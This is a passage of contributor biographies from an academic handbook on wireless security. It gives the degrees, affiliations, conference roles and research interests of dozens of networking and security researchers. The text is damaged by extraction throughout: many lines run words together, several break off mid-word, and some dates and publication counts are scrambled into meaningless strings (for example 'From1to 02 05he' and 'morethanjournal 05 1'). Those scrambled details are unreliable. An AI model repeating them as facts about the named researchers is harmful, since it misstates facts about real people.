Wireless Quality-of-Service: Techniques, Standards and Applications; Broadband Mobile Multimedia:
Techniques and Applications; Internet of Things: From RFID to the Next-Generation Pervasive Net-
worked Systems; Unlicensed Mobile Access Technology: Protocols, Architectures, Security, Standards
and Applications; Cooperative Wireless Communications; WiMAX Network Planning and Optimiza-
tion; RFID Security: Techniques, Protocols and System-On-Chip Design; Autonomic Computing and
Networking; Security in RFID and Sensor Networks; and Handbook of Research on Wireless Security.
He serves as industrial co-chair for MobiHoc 2008, program co-chair for UIC-08, general co-chair
for CoNET 2007, general co-chair for WAMSNet 2007, workshop co-chair FGCN 2007, program vice
co-chair for IEEE ISM 2007, publicity co-chair for UIC-07, publication chair for IEEE ISWCS 2007,
program co-chair for IEEE PCAC’07, special track co-chair for “Mobility and Resource Management in
Wireless/Mobile Networks” in ITNG 2007, special session co-organizer for “Wireless Mesh Networks”
in PDCS 2006, and he is a member of Technical Program Committee for numerous international confer-
ence, including CCNC, AINA, GLOBECOM, ISWCS, ICC, and so forth. He received the Best Paper
Award and Outstanding Service Award as Symposium Chair in the IEEE 21st International Conference
on Advanced Information Networking and Applications (AINA-07). His research interests include
resource, mobility, energy, and security management in wireless networks and mobile computing. He
is a member of IEEE and IEEE ComSoc.
Jun Zheng received the BS and MS degrees in electrical engineering from Chongqing University,
China, in 1993, 1996, respectively, the MSE degree in biomedical engineering from Wright State Univer-
sity, Dayton, Ohio, in 2001, and the PhD degree in computer engineering from University of Nevada, Las
Vegas in 2005. Currently he is an assistant professor in the Department of Computer Science at Queens
College of The City University of New York. He is also a member of the faculty of the doctoral program
in computer science at the Graduate School and University Center of The City University of New York.
He is the co-editor for two books: Security in Wireless Mesh Networks and Handbook of Research on
Wireless Security. He served as general co-chair for WAMSNet-07, track co-chair for ITNG 2007, and
session co-organizer for PDCS 2006. He also served as TPC member for several international confer-
ences. His research interests are mobility and resource management in wireless and mobile networks,
media access control, performance evaluation, network security, computer architectures, fault-tolerant
computing, and image processing. He is member of IEEE.
Miao Ma received the BEng. and MEng. degrees in electrical engineering from Harbin Institute
of Technology, China, respectively, and the PhD degree in electrical and electronic engineering from
Nanyang Technological University (NTU), Singapore. From August 2002 to December 2006, she worked
at the Institute for Infocomm Research (I2R), Singapore. Since January 2007, she has been working
at the Hong Kong University of Science and Technology (HKUST). She is a member of IEEE. Her
research interests include media access control, cognitive radio, security, wireless communications,
and networking.
* * * * *
Sasan AdibireceivedhisBScdegreefromAmirkabirUniversity,Tehran,Iran,in,69first 1 MSc

degree from Brunel University, London in 1999, and second MSc degree from University of Windsor,
Canada, in 2005. He is currently studying towards his PhD degree at the University of Waterloo and
workingasacontractorforSiemensCanadaasaVerificationSystem’sEngineer.Hisareaso
include security (ad hoc networks, 3G, WiMAX, and Wi-Fi), quality of service (QoS) for MPLS- and
wireless-based systems, and optimizations in ad hoc networks. His work experiences include extensive
verificationinrouting(MPLS,OSPF,BGP)quality , ofservicefeatures(DiffServ,e, 1 2.08 WMM,etc.,)
security and authentication (WPA v2, OKC, 802.1X, 802.11i, and RADIUS), Wi-Fi (802.11a/b/g), and
VLAN (802.1D, 802.1Q, and 802.1p).
Gordon B. Agnew received his BASc and PhD in electrical engineering from the University of Wa-
terloo in 1978 and 1982, respectively. He joined the Department of Electrical and Computer Engineering
at the University of Waterloo in 1982. In 1984, he was a visiting professor at the Swiss Federal Institute
of Technology in Zurich where he started his work on cryptography. Dr. Agnew’s areas of expertise
include cryptography, data security, protocols and protocol analysis, electronic commerce systems,
high-speed networks, wireless systems, and computer architecture. He has taught many university
courses and industry sponsored short courses in these areas as well as having authored many articles.
In 1985, he joined the Data Encryption Group at the University of Waterloo. The work of this group led
tosignificantadvancesintheareaofpublickeycryptographicsystemsincludingthede
practical implementation of elliptic curve-based cryptosystems. Dr. Agnew is a member of the Institute
for Electrical and Electronics Engineers, a foundation fellow of the Institute for Combinatorics and its
Applications, and a registered professional engineer in the Province of Ontario. Dr. Agnew has provided
consulting services to the banking, communications, and government sectors. He is also a co-founder
of CERTICOM Corp., a world leader in public key cryptosystem technologies.

Sheikh Iqbal Ahamed is an assistant professor in the Department of Mathematics, Statistics, and
Computer Science at Marquette University and director of the Ubicomp Research Lab. His research
focuses on pervasive security, trust, and privacy for pervasive computing. He received the PhD in com-
puter science from Arizona State University and the BS from the Bangladesh University of Engineering
and Technology.
Christer Andersson is a doctoral student at Karlstad University, Sweden, and his main research topic
is designing and evaluating technologies for anonymous communication in mobile networks. He has
proposed anonymity technologies for both infrastructured and infrastructureless mobile networks. He is
furthermore interested in measuring the degree of anonymity and performance in mobile networks, as
wellasfindinganappropriatetrade-offbetweenanonymityandperformance.HeholdsaLice
engineering degree from Karlstad University (2005), and a Master Degree in computer science (2002)
from Linköping University, Sweden.
AbdelBaset M.H. Awawdeh received the BEng degree in industrial automation engineering from
Palestine Polytechnic University in 1999 and the MSE and PhD degrees in electronics engineering from
Alcala University in 2004. From 1999 to 2000 he joined the Department of Electrical and Computer
Engineering at Palestine Polytechnic University, Palestine. Since 2004, he has held a researcher position
in the Department of Electronics at University of Alcala, Spain. His technical interests include multiagent
system interaction and design, vehicles on-board electronics, and vehicles fault diagnosis system.
Mohamad Badra is employed by the CNRS ( National Center for Scientific Research, France)
researching wireless networks security. Badra performs his research activities at the LIMOS Labora-
tory - UMR6158, University Blaise Pascal. He was a postdoctoral fellow at the Computer Science and
Networks Department, ENST-Paris. His research interests include key exchange, wireless security,
public-key infrastructures, smart cards, and security algorithms. Badra received a PhD in networks and
computer sciences from ENST-Paris. He is a member of the IEEE and of ESRGroups.
Sungmin Baek received his BS degree in School of Information and Communication Engineering,
Sung Kyun Kwan University in 2004 and an MS degree from Department of Computer Engineering
and School of Computer Science and Engineering, Seoul National University in 2006. Currently, he is
a research engineer in information and technology laboratory, LG Electronics Institute of Technology.
His research interests include multimedia transmission over wireless network and wireless personal
area networks.
Javier A. Barria received the BSc degree in electronic engineering from the University of Chile,
Santiago, in 1980, and the PhD and MBA degrees from Imperial College London in 1992 and 1998,
respectively. From 1981 to 1993, he was a system engineer and project manager (network operations)
with the Chilean Telecommunications Company. Currently, he is a reader in the Intelligent Systems
and Networks Group, Department of Electrical and Electronic Engineering, Imperial College London.
His research interests include communication networks monitoring strategies using signal and image
processing techniques, distributed resource allocation in dynamic topology networks, and fair and
efficient resource allocation in IP environments. He has been a joint holder of sever
European Union project contracts all concerned with aspects of communication systems design and

management. Dr. Barria was a British Telecom Research Fellow (2001 – 2002) and a Tan Chin Tuan
Research Fellow, NTU Singapore (2003 - 2004). He is a fellow member of IEE, member of IEEE, and
a chartered engineer.
Paolo Bellavista graduated from University of Bologna, Italy, where he received PhD degree in
computer science engineering in 2001. He is now an associate professor of computer engineering at
the University of Bologna. His research activities span from mobile agent-based middleware solutions
and pervasive wireless computing to location/context-aware services and adaptive multimedia. He is
member of IEEE and Italian Association for Computing (AICA). He is an associate technical editor of
the IEEE Communication Magazine.
Soong Boon-Hee received his BEng (honors I) degree in electrical and electronic engineering from
University of Auckland, New Zealand and a PhD degree from the University of Newcastle, Australia
in 1984 and 1990, respectively. He is currently an associate professor with the School of Electrical and
Electronic Engineering, Nanyang Technological University. From October 1999 to April 2000, he was
a visiting research fellow at the Department of Electrical and Electronic Engineering, Imperial College,
UK under the Commonwealth Fellowship Award. He was awarded the Tan Chin Tuan Fellowship to
visit the Centre for Advanced Computing and Communications, Duke University in June 2004. He also
served as a consultant for mobile IP in a recent technical field trial of next-generati
initiated by IDA (InfoComm Development Authority, Singapore). His area of research interests includes
mobile ad hoc and sensor networks, mobility issues, mobile IP, optimization of wireless networks, rout-
ing algorithms, optimization and planning of mobile communication networks, queuing theory system
theory, quality of service issues in high-speed networks, and signal processing. He has served as a
reviewer for a number of IEEE top journals and international conferences. He has served on Technical
Program Committee for IEEE Globecom 2004, 2005, 2006, and 2007, IEEE WCNC 2005, and IEEE
ISWCS 2004, 2005, 2006, and 2007. He is currently organizing co-chair of IEEE Vehicular Technol-
ogy Conference, Spring 2008 to be held in Singapore. He is currently on the technical committee ISO
204/WG16 that tracks developments in the intelligent transport sector. He is listed in Marquis Who’s
Who in Science and Engineering 2006-2007. He has published more than one hundred international
journals and conferences. He is a senior member of IEEE and a member of ACM.
Noureddine Boudriga is a professor of telecommunication and director of the Communication

Networks and Security (CN&S) Research Laboratory at the University of November 7th at Carthage,
Tunisia. His research interests have covered several topics including communication networks, network
engineering, optical networks, wireless networks, Internet work, and network security. He received his
PhD in mathematics from the University of Paris XI and his PhD in computer science from the Univer-
sity of Tunis. Professor Boudriga is the recipient of the Presidential Award for Science and Research in
Communication Technologies (Tunisia, 2004).
John Buford is a research scientist with Avaya Labs. Previously he was a lead scientist at the Panasonic
Princeton Laboratory, VP of Software Development at Kada Systems, director of Internet Technologies
at Verizon, and chief architect-OSS at GTE, Laboratories. Earlier he was tenured associate professor
of computer science at the University of Massachusetts Lowell, where he also directed the Distributed
Multimedia Systems Laboratory. He has authored or co-authored ninety refereed publications and the

book Multimedia Systems. He is an IEEE senior member and is co-chair of the IRTF Scalable Adaptive
Multicast Research Group. He holds the PhD from Graz University of Technology, Austria, and MS
and BS degrees from MIT.
Mihaela Cardei is an assistant professor in the Department of Computer Science and Engineering at
Florida Atlantic University, and director of the NSF-funded Wireless and Sensor Network Laboratory.
Dr. Cardei received her PhD and MS in computer science from the University of Minnesota, Twin Cit-
ies, in 2003 and 1999, respectively. Her research interests include wireless networking, wireless sensor
networks, network protocol and algorithm design, and resource management in computer networks.
Dr. Cardei is a recipient of the 2007 Researcher of the Year Award at Florida Atlantic University. She
is a member of IEEE and ACM.
Luca Caviglione (M.D. 2002, Ph.D. 2006) participated in several research projects funded by the
EU, by ESA, and by Siemens COM AG. He is author and co-author of many academic publications
about TCP/IP networking, P2P systems, QoS architectures, and wireless networks. He is a member
of the Italian IPv6 Task Force and he participates in several TPCs and performance talks about IPv6
and P2P. He is with the Institute of Intelligent Systems for Automation (ISSIA) – Genoa Branch of the
National Research Council of Italy.
Symeon Chatzinotas has a BSc in electrical and computer engineering from Aristotle University of
Thessaloniki and a MSc in microwave engineering and wireless subsystem design from University of
Surrey. Since 2006 he has been working on his PhD at the Centre for Communication Systems Research,
University of Surrey. His current research interests include mobile networking, wireless security, and
network information theory.
Hsiao-Hwa Chen is currently a full professor in Institute of Communications Engineering, Na-

tional Sun Yat-Sen University, Taiwan. He received BSc and MSc degrees with the highest honor from
Zhejiang University, China, and a PhD degree from the University of Oulu, Finland, in 1982, 1985 and
1990, respectively, all in electrical engineering. He worked with Academy of Finland as a Research
Associate from 1991 to 1993 and the National University of Singapore as a lecturer and then a senior
lecturer from 1992 to 1997. He joined Department of Electrical Engineering, National Chung Hsing
University, Taiwan, as an associate professor in 1997 and was promoted to a full professor in 2000.
In 2001 he joined National Sun Yat-Sen University, Tai-Wan, as a founding director of the Institute of
Communications Engineering of the University. Under his strong leadership the institute was ranked
second in the country in terms of SCI journal publications and National Science Council funding per
facultymemberin02.4Inparticular,NationalSunYat-SenUniversitywasrankedfirstinthe
in terms of the number of SCI journal publications in wireless LANs research papers during 2004 to
mid-2005, according to a research report (www.onr.navy.mil/scitech/special/354/technowatch/textmine.
asp)releasedbyTheOfficeofNavelResearch,USA.HewasavisitingprofessortotheDepartmen
Electrical Engineering, University of Kaiserslautern, Germany, in 1999, the Institute of Applied Phys-
ics, Tsukuba University, Japan, in 2000, Institute of Experimental Mathematics, University of Essen,
Germany in 2002 (under DFG Fellowship), the Chinese University of Hong Kong in 2004, and the City
University of Hong Kong in 2007.

Thomas Chen is an associate professor at Southern Methodist University. Prior to joining SMU, he
worked on ATM research at GTE Laboratories (now Verizon). He has been the editor-in-chief of IEEE
Communications Magazine since 2006. He also serves as senior technical editor for IEEE Network, and
was the founding editor of IEEE Communications Surveys. He co-authored ATM Switching Systems
(Artech House 1995). He received the IEEE Communications Society’s Fred W. Ellersick Best Paper
Award in 1996.
Yifan Chen received the BEng and PhD degrees in electrical and electronic engineering from Nan-
yang Technological University (NTU), Singapore, in 2002 and 2006, respectively. He is presently with
the Biomedical Engineering Research Centre, NTU, as a research fellow. His current research interests
involve ultra-wideband (UWB) radar system for biomedical applications including microwave imaging
of human tissues and noncontact vital-signs monitoring, statistical modeling of mobile radio channels,
UWB signal processing for wireless communications and geolocation systems, multiple-antenna system
performance analysis, and wireless networks.
Zhijia Chen is currently a PhD student in Department of Computer Science and Technology, Tsin-
ghua University. He is a visiting graduate student at School of Engineering of Stanford in Spring 2007.
His research area is in P2P networking and media streaming. He has published four academic papers
in area of P2P streaming, protocol modeling, and so forth. He is the International First Prize winner in
American Mathematical Contest in Modeling (MCM 2004 Meritorious Winners). He is also the network
session chair in 1st Beijing-Hong Kong Doctoral Forum on Network and Media 2006.
Yanghee Choi received BS in electronics engineering from Seoul National University, MS in elec-
trical engineering from Korea Advanced Institute of Science, and Doctor of Engineering in computer
science from Ecole Nationale Superieure des Telecommunications (ENST) in Paris, in 1975, 1977, and
1984, respectively. He was with the Electronics and Telecommunications Research Institute (ETRI)
during 1977-1991. He is now leading the Multimedia and Mobile Communications Laboratory in Seoul
National University. He is also director of Computer Network Research Center in Institute of Computer
Technology (ICT). He is vice-president of Korea Information Science Society. His research interest lies
inthefieldofmultimediasystemsandhigh-speednetworking.
Mohammad M. R. Chowdhury is working toward the PhD degree in the University Graduate Center
at Kjeller (UniK)/University of Oslo, Norway in the area of user mobility and service continuity. He
received his MSc from Helsinki University of Technology in radio communications. His current areas of
interest are identity and identity based service interactions, seamless user experience in heterogeneous
wireless networks, and development of innovative service concepts for mobile operators.
Tomasz Ciszkowski received MSc degree in electronics and computer engineering from Faculty of
Electronics and Information Technology of Warsaw University of Technology (WUT), Poland, in 2004.
Currently, he is working toward a PhD degree in telecommunications at WUT on reputation service in
anonymous ad hoc networks. Since 2004 he has been working for Polish Telecom in multimedia services
division.HisresearchactivitiesarereflectedinEuropeanresearchprojectsonnext
(EuroNGI) and end-to-end QoS support over heterogeneous networks (EuQoS).

Amitabha Das obtained his BTech (honors) degree in electronics and electrical communication
engineering from the Indian Institute of Technology, Kharagpur in 1985, and his PhD in computer
engineering from the University of California, Santa Barbara, in 1991. Currently he is an associate
professor in the School of Computer Engineering in Nanyang Technological University, Singapore. His
research interests include wireless and mobile networks, network security, and intrusion detection. He
is a senior member of IEEE.
Robert H. Deng received his Bachelor from National University of Defense Technology, China, and
his MSc and PhD from the Illinois Institute of Technology. He has been with the Singapore Management
University since 2004, and is currently a professor, associate dean for Faculty & Research, and director
of SIS Research Center, School of Information Systems. Prior to this, he was principal scientist and
manager of Infocomm Security Department, Institute for Infocomm Research, Singapore. He has 26
patents and more than 200 technical publications in international conferences and journals in the areas
of computer networks, network security, and information security. He served as general chair, program
committee chair, and member of numerous international conferences, including PC co-chair of the 2007
ACM Symposium on Information, Computer and Communications Security. He received the University
Outstanding Researcher Award from the National University of Singapore in 1999 and the Lee Kuan
Yew Fellow for Research Excellence from the Singapore Management University in 2006.
Mieso Denko is an associate professor of computing and information science at the University of
Guelph, Ontario, Canada. He received his BSc degree in statistics and mathematics from Addis Ababa
University. He received his MSc degree form the University of Wales, UK, and his PhD degree from
the University of Natal, South Africa, both in computer science. His current research interests include
wireless ad hoc networks, wireless mesh networks, wireless sensor networks, pervasive computing, and
networking. He has published numerous research papers in international journals, conferences, work-
shops, and contributed to book chapters. Currently he is co-editing three books in the above areas. Dr.
Denko has been actively involved in professional services as organizer or co-organizer of international
conferences, symposiums, and workshops, as well as TPC member for a number of conferences and
workshops. Among these, most recently he was the general co-chair of the IEEE PCAC-07, general
vice-chair of ISPA-07 and program vice-chair of IEEE AINA-07. Currently he is a program vice-chair
of the IEEE AINA-08, and co-organizer and program co-chair of the IEEE MHWMN-07 and IST-
AWSN-07. Dr. Denko is a senior member of the ACM, a member of the IEEE, ACM SIGMOBILE,
IEEE Communications Society, and IEEE Computer Society. Currently, he is an associate professor of
computing and information science at the University of Guelph, Ontario, Canada.
Yacine Djemaiel holds a Master Degree in telecommunications and he is currently preparing his
PhD thesis in telecommunications in the Engineering School of Communications (SUP’COM, Tuni-
sia). He is conducting research activities in the area of intrusion detection and tolerance and digital
investigation of security incidents. Since September 2006, Mr. Djemaiel has been a teacher assistant
in telecommunications.
Felipe Espinosa got the BSc and MSc degrees in telecommunications from Polytechnics University
of Madrid (Spain) in 1984 and 1991, respectively. He received the PhD degree in telecommunications
from University of Alcala (Spain) in 1998. He was a lecturer from 1985 to 2000 and has been an associ-

ate professor since 2000, always in the Electronics Department at the University of Alcalá (Spain). His
main research interests include electronic control and communication applied to cooperative guidance
of robots and vehicles, as well as intelligent transportation systems.
Simone Fischer-Hübner has been a full professor at the Computer Science Department of Karlstad
University since June 2000, where she is the head of the PriSec (Privacy & Security) research group. She
received Doctoral (1992) and Habilitation (1999) degrees in computer science from Hamburg University.
Her research interests include technical and social aspects of IT-security, privacy, and privacy-enhancing
technologies. She was a research assistant/assistant professor at Hamburg University (1988-2000) and
a guest professor at the Copenhagen Business School (1994-1995) and at Stockholm University/Royal
Institute of Technologies (1998-1999).
J. Antonio Garcia-Macias holds a PhD from the Institut National Polytechnique de Grenoble
(INPG), France. He is currently a researcher at CICESE Research Center, working in the Computer Sci-
ence Department. His current research interests are wireless (ad hoc and sensors) networks, ubiquituous
computing, next-generation Internet services and protocols, and distributed collaborative systems.
Kaj J. Grahn, Dr. Tech. from Helsinki University of Technology, is presently a senior lecturer in
telecommunications at the Department of Business Administration, Media, and Technology at Arcada
Polytechnic, Helsinki, Finland. His current research interests include mobile and wireless networking
and network security.
Stefanos Gritzalis holds a BSc in physics, an MSc in electronic automation, and a PhD in informatics,
all from the University of Athens, Greece. Currently he is an associate professor, the head of the Depart-
ment of Information and Communication Systems Engineering, University of the Aegean, Greece, and
the director of the Laboratory of Information and Communication Systems Security (Info-Sec-Lab). His
publishedscientificworkincludesseveralbooksandmorethanjournal 05 1 andinternat
papers. The focus of these publications is on information and communication systems security. He was
a member (secretary general, treasurer) of the Board of the Greek Computer Society.
Yong Guan is an assistant professor in the Department of Electrical and Computer Engineering
at Iowa State University. He received his BS (1990) and MS (1996) in computer science from Peking
University, China, and his PhD (2002) in computer science from Texas A&M University. His research
interests are computer and network forensics, wireless and sensor network security, and privacy-enhanc-
ing technologies for the Internet. He received the Best Student Paper Award from the IEEE National
Aerospace and Electronics Conference in 1998, won 2nd place in the graduate category of the Interna-
tional ACM Student Research Contest in 2002, and was named the Litton Assistant Professor by Iowa
State University in 2007.
Mohamed Hamdi received his Engineering Diploma, Master Diploma, and PhD in telecommunica-
tions from the Engineering School of Communications (Sup’Com, Tunisia) in 2000, 2002, and 2005,
respectively.From1to 02 05he
2 workedfortheNationalDigitalCertificationAgency - ( NDCA,Tu
nisia) where he was head of the Risk Analysis Team. Dr. Hamdi was in charge in building the security
strategyfortheTunisianRootCertificationAuthorityandincontinuouslyassessin

NDCAs networked infrastructure. He has also served on various national technical committees for se-
curing e-government services. Currently, Dr. Hamdi is serving as a contract lecturer for the Engineering
School of Communications at Tunis. He is also a member of the Communication Networks and Security
Lab (Coordinator of the Formal Aspects of Network Security Research Team), where he is conducting
researchactivitiesintheareasofriskmanagement,algebraicmodeling, - relationals
sion detection, network forensics, and wireless sensor networks
Munirul M. Haque is currently a PhD student at Purdue University. He received the MS degree
in computer science at Marquette University where he researched pervasive computing, security, and
privacy in the Ubicomp Research Lab. He completed the BS in computer science and engineering from
Bangladesh University of Engineering and Technology.
Jahan Hassan is a research fellow at the School of Information Technologies, University of Sydney.
She received her PhD in 2004 from University of New South Wales, Sydney, and Bachelor degree in
1995 from Monash University, Melbourne, both in computer science. She is published widely in peer-
reviewed conferences and journals. She was a member of the Technical Program Committee of IEEE
LCN 2006, IEEE ICC 2007, IEEE ISWPC 2007, IADIS AC 2006, and IADIS WAC 2007. She served
as a reviewer for many conferences and journals. Her research interests include mobile and wireless
networking architectures and wireless network security. Her current project focuses on the fast authen-
tication techniques for multiprovider access networks.
Artur Hecker received a diploma in computer science (Dipl.inform.) from the University of Karl-
sruhe (TH), Germany in 2001. In 2005, he received a PhD degree in computer science and networking
from the ENST, France. After his thesis, he worked as CTO of Wavestorm SAS, which he co-founded
in 2003. Since 2006, Dr. Hecker holds a position as associate professor at the INFRES department at
the ENST. His present research interests are wireless access security, security assurance of complex
systems, network and service management, and autonomous networking. Dr. Hecker is actively involved
in several IST FP6 and EUREKA CELTIC research activities.
Silke Holtmanns received her PhD in mathematics from the University of Paderborn (Germany),
Department of Computer Science and Mathematics. She has been a senior researcher at Nokia Research
Center since 2004. Before that, she was working in Ericsson Research Lab Aachen (Germany) as a
masterresearchengineerandattheUniversityofPaderbornasascientificassistant
30 publications and co-authored several books on mobile security. She is also rapporteur of six 3GPP
securityspecificationsandreportsandinvolvedinvariousstandardizationactiv
Ismail Khalil Ibrahim is a senior researcher and lecturer at the Institute of Telecooperation- Jo-
hannes Kepler University Linz, Austria, where he teaches, consults, and conducts research in mobile
multimedia applications and services, agent technologies, and information integration. He received his
MSc and PhD in computer engineering and information systems from Gadja Mada University, Indonesia.
Dr. Ibrahim previously served as a research fellow at Intelligent Systems Group in the Netherlands and
as project manager at the Software Competence Center Hagenberg, Austria. He is the editor-in-chief of
Advances in Next Generation Mobile Multimedia book series and Journal of Mobile and Multimedia
Communications, and co-editor in chief of the International Journal of Web Information Systems (JWIS)

and the Journal of Mobile Multimedia (JMM). His research interests also include business, social, and
policy implications associated with the emerging Web technologies.
Biju Issac is a lecturer in the School of IT and Multimedia in Swinburne University of Technology
(Sarawak Campus), Malaysia. He is also the head of Network Security Research Group in the Informa-
tion Security Research Lab at Swinburne University Sarawak. He is an electronics and communication
engineer with a post graduate degree in computer applications. Currently he is doing part-time PhD in
networking and mobile communications in UNIMAS, Malaysia. His research interests are in wireless
and network security, wireless mobility, and IPv6 networks.
Tao Jiang is a research scientist at the Department of Electronic and Computer Engineering, University
of Michigan, Dearborn. He received BS and MS degrees in applied geophysics from China University of
Geosciences, Wuhan in 1997 and 2000, respectively, and a PhD degree in information and communication
engineering from Huazhong University of Science and Technology, Wuhan, P. R. China in April 2004.
From August 2004 to August 2005, he worked at Brunel University, London, as an academic visiting
scholar, and then moved to University of Puerto Rico in 2006. His current research interests include
the areas of wireless communications and corresponding signal processing, especially for OFDM and
MIMO systems, cooperative networks, cognitive radio, and ultra wideband communications.
John Felix Charles Joseph is currently pursuing PhD in computer science from Nanyang Techno-
logical University, Singapore. His research interests include security in wireless and ad hoc networks,
computational intelligence, multicast routing security, and multimedia. He received his Bachelor in
engineering, computer science from Madras University, India in 2002 and MS from Anna University,
India in 2005. His current work involves design of an intrusion detection algorithm for mobile wireless
ad hoc network environment.
Admela Jukan is a professor in electrical and computer engineering at the Technical University
Carolo Wilhelmina in Braunschweig, Germany. Prior to coming to TU Braunschweig, she was with
University of Illinois at Urbana Champaign (UIUC), Georgia Tech (GaTech), University of Quebec
(EMT-INRS), and Vienna University of Technology (TU Wien). From 2002-2004, she served as program
director in computer and networks system research at the National Science Foundation (NSF) in Arling-
ton, VA. While at NSF, she was responsible for funding and coordinating US-wide university research
and education activities in the area of network technologies and systems. She received the MSc degree
in information technologies and computer science from the Polytechnic of Milan, Italy, and the PhD
degree (cum laude) in electrical and computer engineering from the Vienna University of Technology
(TUWien)Austria.
, Dr.Jukanistheauthorofnumerouspapersinthefieldofnetworking,andshe
authored and edited several books. She serves as a member of the Quality Assurance Committee for the
EU Network of Excellence, ePhoton/One. Dr. Jukan has chaired and co-chaired several international
conferences, including IFIP ONDM, IEEE ICC, and IEEE GLOBECOM. She serves on the editorial
board of the IEEE Communications Surveys and Tutorials. She is a senior member of the IEEE.
György Kálmán is a graduate student at UniK, University Graduate Center in Kjeller, Norway. His
research area covers personal and device authentication, security, and privacy in wireless systems. He
got his MSc degree in the area of communication networks from the Budapest University of Technology
and Economics. He was research fellow at Telenor R&I at the Media Platforms group.
0
Georgios Kambourakis received the diploma in applied informatics from the Athens University
of Economics and Business and the PhD in information and communication systems engineering from
the Department of Information and Communications Systems Engineering of the University of Aegean.
He also holds a MEd from Hellenic Open University. Dr. Kambourakis is a lecturer in the Department
of Information and Communication Systems Engineering of the University of the Aegean, Greece.
Hisresearchinterestsareinthefieldsofmobileandadhocnetworkssecurity,VoIPsec
protocols, and PKI, and he has more than 35 publications in the above areas.
Jonny Karlsson has a BSc in information technology from Arcada Polytechnic, Helsinki Finland.
Since May 2002 he has been working at Arcada Polytechnic as a course assistant and course teacher
in programming and network security related courses and as a research assistant. His current research
interests include wireless and mobile network security.
Paris Kitsos received the BSc degree in physics in 1999 and a PhD in 2004 from the Department
of Electrical and Computer Engineering, both at the University of Patras. Currently is research fellow
with the Digital Systems & Media Computing Laboratory, School of Science & Technology, Hellenic
Open University (HOU). His research interests include VLSI design, hardware implementations of
cryptographic algorithms, and security protocols for wireless communication systems. Dr. Kitsos has
publishedmorethanscientific 60 articlesandtechnicalreports,aswellasisreviewin
books, international journals, and conferences/workshops in the areas of his research. He has partici-
pated in international journals and conferences organization, as program/technical committee member
and guest editor.
Giorgos Kostopoulos received his diploma in electrical and computer engineering from the Elec-
trical & Computer Engineering Department, University of Patras, Greece in 2003. Since then he has
been working as a researcher engineer in the Department of Electrical and Computer Engineering of
the University of Patras. His research interests include security in wireless networks, new generation
networks architectures, security management in new generation networks, and communication networks.
Giorgos Kostopoulos has published more than 15 technical papers and book chapters in these areas. He
has also participated as senior engineer in European Research Projects.
Zbigniew Kotulski received his MSc in applied mathematics from Warsaw University of Technology
and PhD and DSc degrees from Institute of Fundamental Technological Research of the Polish Acad-
emy of Sciences. He is currently professor at IFTR PAS and professor and head of Security Research
Group at Department of Electronics and Information Technology of Warsaw University of Technology,
Poland. He is the author and co-author of three books and more than 150 research papers on applied
mathematics, cryptology, and information security.
Odysseas Koufopavlou received the Diploma of Electrical Engineering in 1983 and the PhD degree
in electrical engineering in 1990, both from University of Patras, Greece. From 1990 to 1994 he was at
the IBM Thomas J. Watson Research Center, Yorktown Heights, NY. He is currently a professor with
the Department of Electrical and Computer Engineering, University of Patras. His research interests
include computer networks, high performance communication subsystems architecture and implementa-
tion, VLSI low power design, and VLSI crypto systems. Dr. Koufopavlou has published more than 150

technical papers and received patents and inventions in these areas. He has participated as coordinator
or partner in many Greek and European R&D programs. He served as general chairman for the IEEE
ICECS’1999.
Geng-Sheng (G.S.) Kuo worked with R&D laboratories of the communications industry in the
United States, such as AT&T Bell Laboratories. In August 2000, he joined National Chengchi University,
Taipei, Taiwan as a professor. Since 2001, he has been invited as chair professor of Beijing University of
Posts and Telecommunications (BUPT) in Beijing, China. His current research interests include mobile
communications, wireless communications, and IP-networks. From 2001 to 2002, he was editor-in-chief
of IEEE Communications Magazine, whose impact factor in 2002 was 3.165. Currently, he is area editor
for Networks Architecture of IEEE Transactions on Communications, editor and ComSoc representative
to IEEE Internet Computing, editor of European Transactions on Telecommunications, and so forth.
Taekyoung Kwon is an assistant professor in Multimedia & Mobile Communications Lab., School
of Computer Science and Engineering, Seoul National University He received his PhD, MS, and BS
degrees in computer engineering from Seoul National University in 2000, 1995, and 1993, respectively.
He was a visiting student at IBM T. J. Watson Research Center in 1998 and a visiting scholar at the
University of North Texas in 1999. His recent research areas include radio resource management, wire-
less technology convergence, mobility management, and sensor network.
Pekka Laitinen received his MSc degree in information sciences in Helsinki University of Technol-
ogy, Department of Engineering Physics and Mathematics. He is principal engineer in Nokia Research
Center where he has been working since 1996. His research interests include identity management and
applied security.
Björn Landfeldt received a BSc equivalent from the Royal Institute of Technology in Sweden. He
received his PhD from The University of New South in 2000. Afterwards he joined Ericsson Research
in Stockholm as a Senior Researcher. In 2001, Dr. Landfeldt took up a position as a CISCO senior
lecturer in Internet Technologies at the University of Sydney. He has published more than 50 publica-
tions in international books, journals, and conferences. Dr. Landfeldt is serving on the editorial boards
of international journals and as a program committee member of many international conferences. His
research interests include wireless systems, systems modeling, mobility management, and QoS.
Peter Langendoerfer received his doctoral degree in 2001. Since 2000 he has been with the IHP in
Frankfurt (Oder) where he is leading the mobile middleware group. He has published more than 55 refer-
eedtechnicalarticles,filedsevenpatentsinthesecurity/privacyarea,andworkedasg
Journal of Super Computing (Kluwer), Computer Communications (Elsevier), Wireless Communications
and Mobile Computing (Wiley), and ACM Transactions on Internet Technology. He is/was also a TPC
member/chair of many conferences. His research interests include mobile communication (especially
privacy and security issues), protocol engineering, and automated protocol implementation.
Shahram Latifi, an IEEE fellow, received the Master of Science degree in electrical engineering
from Fanni, Teheran University, Iran in 1980. He received the Master of Science and the PhD degrees
both in electrical and computer engineering from Louisiana State University, Baton Rouge in 1986 and

1989, respectively. He is currently a professor of electrical engineering at the University of Nevada, Las
VegasanddirectoroftheCenterforInformationandCommunicationTechnologiesCICT) ( Dr.
. Lat
designed and taught graduate courses on security, image processing, computer networks, fault tolerant
computing, and data compression in the past 16 years. He has given seminars on the aforementioned
topics all over the world. He has authored over 120 technical articles in the areas of image processing,
document analysis, computer networks, fault tolerant computing, parallel processing, and data com-
pression. His research has been funded by NSF, NASA, DOE, Boeing, Lockheed, and Cray Inc. Dr.
LatifiisanassociateeditoroftheIEEETransactionsonComputersandco-founderandgen
of the IEEE International Conference on Information Technology. He is also a registered professional
engineer in the State of Nevada.
Bu-Sung Lee received his BSc (honors) and PhD from the Electrical and Electronics Department,
Loughborough University of Technology, UK in 1982 and 1987, respectively. He is currently associate
chair (research) with the School of Computer Engineering, Nanyang Technological University. He is
also the founding president of Singapore Research and Education Networks (SingAREN). He has been
an active member of several national standards organization such as the National Grid Pilot Project.
His research interests are in network management, broadband, distributed, ad hoc and mobile networks,
network optimization, as well as grid computing.
Supeng Leng is an associate professor in the School of Communication and Information Engineering,
